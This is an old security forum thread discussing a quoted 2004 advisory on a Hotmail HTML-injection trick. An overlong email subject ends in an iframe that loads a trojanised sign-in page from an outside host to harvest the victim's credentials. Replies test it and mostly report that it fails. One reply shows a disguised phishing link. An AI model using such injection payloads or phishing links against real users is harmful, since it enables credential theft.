Hotmail Question
Results 1 to 10 of 10

Thread: Hotmail Question

  1. #1
    Senior Member
    Join Date
    Oct 2003
    Posts
    707

    Hotmail Question

    This seems quite interesting. Haven't been able to try it on myself since I no longer use hotmail. Was wondering if someone was willing to try it and see if it actually works. If it does work well I guess that you can consider it to be a warning to something that you might wanna warn hotmail users about.

    Thursday, March 18, 2004

    Unbelievably ridiculous insertion of arbitrary html into the
    Hotmail web based email account of your targeted "buddy".

    In order to gain your "little pal's" credentials, simply send
    him or her an email with an extra long subject like so:

    heylittlebuddyheylittlebuddyheylittlebuddyheylittlebuddyheylittle
    buddyheylittlebuddyheylittlebuddy
    heylittlebuddyheylittlebuddyheylittlebuddyheylittlebuddyheylittle
    buddyheylittlebuddyheylittlebuddy
    heylittlebuddyheylittlebuddyheylittlebuddyheylittlebuddyheylittle
    buddyheylittlebuddyheylittlebuddy
    heylittlebuddyheylittlebuddyheylittlebuddyheylittlebuddyheylittle
    buddyheylittlebuddyheylittlebuddy
    heylittlebuddyheylittlebuddyheylittlebuddyheylittlebuddyheylittle
    buddyheylittlebuddyheylittlebuddy
    heylittlebuddyheylittlebuddyheylittlebuddyheylittlebuddyheylittle
    buddyheylittlebuddyheylittlebuddy
    heylittlebuddyheylittlebuddyheylittlebuddyheylittlebuddyheylittle
    buddy<iframe src="http://www.malware.com/pithy.html">

    Where our iframe points to window.open along with our trojanised
    passport re-sign in page. When your "chum" replies to your
    email, our iframe is rendered out of sight in the message body
    of the email and up goes our error window requesting him to
    login again. Only this time he'll be sending you his credentials.

    Notes:

    1. this is too pathetic for words. Cursory checking of all
    settings in hotmail 'reply to' suggests there is no de-
    activation of html email when composing a reply.
    2. consideration was given to informing the owner of this
    particular web based mail service of this particular issue
    however we have not used such a poor service in recent years. So
    much so one can only suspect that such a slovenly operation is
    intentional in order to force account users to upgrade to the
    pay service:

    a) as of three hours from time of writing we are still awaiting
    receipt of emails into the hotmail account from eight [that's
    numeral 8] different mail servers. Internal mail messages are
    instant, but three hours for external is completely unacceptable.
    b) constant 'server is busy' errors. What does 40 billion
    dollars buy you today. More acreage around your acreage for more
    privacy.
    b) initiation and re-activation of a dormant account of the free
    webmail account from the owner of this particular web based mail
    service requires a magnifying glass to see. if you don't have
    one, you're liable to select the pay for service as it appears
    there are no other choices.
    c) use yahoo mail. Instant receipt of emails from any mail
    server all the time. Reply to html email subject filters tags.

    End Call

    --
    http://www.malware.com
    Operation Cyberslam
    \"I\'ve noticed that everybody that is for abortion has already been born.\" Author Unknown
    Microsoft Shared Computer Toolkit
    Proyecto Ututo EarthCam
    Share on Google+

  2. #2
    Senior Member
    Join Date
    Jun 2003
    Posts
    220
    If its true, its cool.... have u tried it?
    Now is the moment, or NEVER!!!
    Share on Google+

  3. #3
    AntiOnline n00b
    Join Date
    Feb 2004
    Posts
    665
    no it's not working for me first of all how can i put a subject that long
    heylittlebuddyheylittlebuddyheylittlebuddyheylittl
    ebuddyheylittle
    buddyheylittlebuddyheylittlebuddy
    heylittlebuddyheylittlebuddyheylittlebuddyheylittl
    ebuddyheylittle
    buddyheylittlebuddyheylittlebuddy
    heylittlebuddyheylittlebuddyheylittlebuddyheylittl
    ebuddyheylittle
    buddyheylittlebuddyheylittlebuddy
    heylittlebuddyheylittlebuddyheylittlebuddyheylittl
    ebuddyheylittle
    buddyheylittlebuddyheylittlebuddy
    heylittlebuddyheylittlebuddyheylittlebuddyheylittl
    ebuddyheylittle
    buddyheylittlebuddyheylittlebuddy
    heylittlebuddyheylittlebuddyheylittlebuddyheylittl
    ebuddyheylittle
    buddyheylittlebuddyheylittlebuddy
    heylittlebuddyheylittlebuddyheylittlebuddyheylittl
    ebuddyheylittle
    buddy<iframe src="http://www.malware.com/pithy.html">
    when the max limit is i think 80 characters
    hetlittleheylittlebuddyheylittlebudd<iframe src="http://www.malware.com/pithy.html">
    this is the maxmum long Subject i can have. and when i open the E-mail no new page pops up. when i manually clicked on http://www.malware.com/pithy.html then a new Sign-In window appears. but it did nothing just said i have already logged in . And when i reply nothing just the mail
    Share on Google+

  4. #4
    Senior Member
    Join Date
    Sep 2003
    Posts
    500
    The only way that I know to do that is the way phishers are doing it these days. Next time I get one of those emails, I will post the HTML and let you look at it. Basically, they give you a nice organized letter from say Paypal asking you to login to reset a security lock put on your account. Well the link they provide you looks like this

    <a href="%.321%2112%32123%545%221%12512185%5456415848%16842185%5165841218452%541842184125.our_bad_site.html">http://www.paypal.com</a>

    So what happens is that the browser shows only the end part. That links the user or course to a hacked version of Paypal's login script.

    So in long, I don't think that that little subject line trick is going to work.
    You shall no longer take things at second or third hand,
    nor look through the eyes of the dead...You shall listen to all
    sides and filter them for your self.
    -Walt Whitman-
    Share on Google+

  5. #5
    Senior Member
    Join Date
    Apr 2003
    Posts
    147
    First off i'm assuming you need to do this from the hotmail page, you know, keep it in house for this to work...

    FOR TESTING PURPOSES ONLY I assume their way of sending a subject of arbitrary length is to save it to the hard drive, edit out the length limit and submit from your saved page.

    If anyone finds that this works, DO NOT LET US KNOW. Goto Microsofts Report a Security Vulnerability page and report it to them. (If they don't take care of it that's their problem )

    Don't be stupid,

    Jon.

    [edit]
    On second thought, should someone post here if it works? my instincts say no, but I'm not the master of the way things are done. Wait till a descision is reached on that one before replying on anything.
    [/edit]
    Share on Google+

  6. #6
    Senior Member
    Join Date
    Oct 2001
    Posts
    786
    It is so much easier just to send yourself an account from another mail service. I sent myself an e-mail entitled "Re: testtesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttestteststtestteststtestesttest<iframe src="http://www.google.com/">" which is about 256 or so characters long. That is all that Outlook Express lets me put in, and was above the 80 character quoted. So I send it, and open it in Hotmail. Do I see google? Nope. I viewed the source, and everything appears to be properly escaped out.

    So initial conclusion - it is already patched.

    -Tim_axe
    Share on Google+

  7. #7
    Junior Member
    Join Date
    Feb 2004
    Posts
    5
    with the resunt updates to hotmail it will no longer work because of a cookie saying u are loged in
    :-) Raven :-)
    Share on Google+

  8. #8
    Just Another Geek
    Join Date
    Jul 2002
    Location
    Rotterdam, Netherlands
    Posts
    3,403
    Originally posted here by Tim_axe
    So I send it, and open it in Hotmail. Do I see google? Nope. I viewed the source, and everything appears to be properly escaped out.
    Have you tried to reply this email?

    If I read it correctly it states:
    Cursory checking of all settings in hotmail 'reply to' suggests there is no de-activation of html email when composing a reply.
    Oliver's Law:
    Experience is something you don't get until just after you need it.
    Share on Google+

  9. #9
    Senior Member
    Join Date
    Oct 2001
    Posts
    786
    Yup, I tried replying, and ended up with a reply subject that was about 259 characters long. I also saw <iframe src="http://www.google.com/"> at the end of the subject, but couldn't find google load up. Perhaps it is possible that the website needs to pop-up or something, but I don't want to use their website in the iframe, since it happens to be one of my major e-mail accounts, and the referrer ID would probably include that private information Hotmail likes to tag along in the URL...

    Nevermind, I just tried their URL. Reply. It seems escaped out (no sign in again). So this no longer works, if it ever did.
    Share on Google+

  10. #10
    Banned
    Join Date
    Apr 2004
    Posts
    94
    dude i m sorry to say but as others said the method does not work
    Share on Google+

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •